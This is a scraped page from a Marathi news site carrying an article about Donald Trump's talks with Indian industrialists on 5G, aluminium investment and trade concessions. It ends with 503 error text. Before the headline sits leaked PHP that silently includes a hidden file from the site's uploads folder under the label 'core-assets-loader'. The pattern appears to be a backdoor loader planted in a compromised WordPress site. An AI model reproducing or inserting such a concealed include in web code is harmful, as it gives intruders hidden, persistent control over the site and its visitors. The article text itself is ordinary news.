add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); सर्वात श्रीमंत भारतीयाला ट्रम्प म्हणाले ‘मी असताना चिंता कसली ?’ – SOCH INDIA
Menu

देश
सर्वात श्रीमंत भारतीयाला ट्रम्प म्हणाले ‘मी असताना चिंता कसली ?’

nobanner

अमेरिकेचे राष्ट्राध्यक्ष डोनाल्ड ट्रम्प हे दोन दिवसांच्या भारत दौऱ्यावर आले होते. यादरम्यान मंगळवारी त्यांनी भारतातील प्रमुख २० कंपन्यांच्या प्रमुखांशी चर्चा केली. या चर्चेदरम्यान रिलायन्स इंडस्ट्रीजचे प्रमुख मुकेश अंबानी यांनी त्यांना अमेरिकेतील आपल्या ऊर्जा क्षेत्रातील गुंतवणुकीबाबत माहिती दिली. तसंच त्यांनी भारतीय दूरसंचार क्षेत्रातील रिलायन्सच्या भूमिकेबद्दलही सांगितलं. यावर ट्रम्प यांनी त्यांना त्यांची कंपनी ५ जी तंत्रज्ञानावर काम करत आहे का? असा सवाल केला. यावर उत्तर देताना रिलायन्स समूह ५ जी तंत्रज्ञानावर काम करत असून ही अशी एकमेव कंपनी आहे जी चीनच्या मदतीशिवाय ५जी लाँच करणार असल्याचं त्यांनी सांगितलं. तसंच त्यांनी गेल्या काही वर्षांपासून अमेरिकेतील व्यापारामध्ये सूट मिळत असल्याचं म्हटलं. यावर उत्तर देताना ट्रम्प यांनी जोवर आपण आहोत तोवर सूट मिळत राहणार असल्याचं म्हटलं.

आदित्य बिर्ला समुहाचे अध्यक्ष कुमार मंगलम बिर्ला यांनी ट्रम्प यांना आपण लवकरच अमेरिकेतील अॅल्युमिनिअम क्षेत्रात गुंतवणूक करणार असल्याची माहिती दिली. तसंच अमेरिकेत आपण अॅल्युमिनिअमचं उत्पादन सुरू करणार असल्याचंही ते म्हणाले. यावर उत्तर देताना ट्रम्प म्हणाले की,”जर मी निवडणूक जिंकलो नसतो तर हे क्षेत्र बंद झालं असतं.” “जर मी पुन्हा निवडणूक जिंकलो नाही तर अमेरिकेतील अॅल्युमिनिअम उत्पादन क्षेत्र पूर्णपणे बंद होईल,” असंही त्यांनी नमूद केलं.

त्या लोकांनी (विरोधी पक्षानं) अॅल्युमिनिअम उत्पादन क्षेत्र पूर्णपणे ठप्प केलं होतं. मी सत्तेत आल्यानंतर या क्षेत्राला उभारी देण्याचा प्रयत्न केला आहे, असं ट्रम्प म्हणाले. जर अमेरिकेनं कर दरात कपात केली तर त्या ठिकाणी आपणही व्यवसाय सुरू करू असं टाटा सन्सचे अध्यक्ष एन. चंद्रशेखरन यांनी सांगितलं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.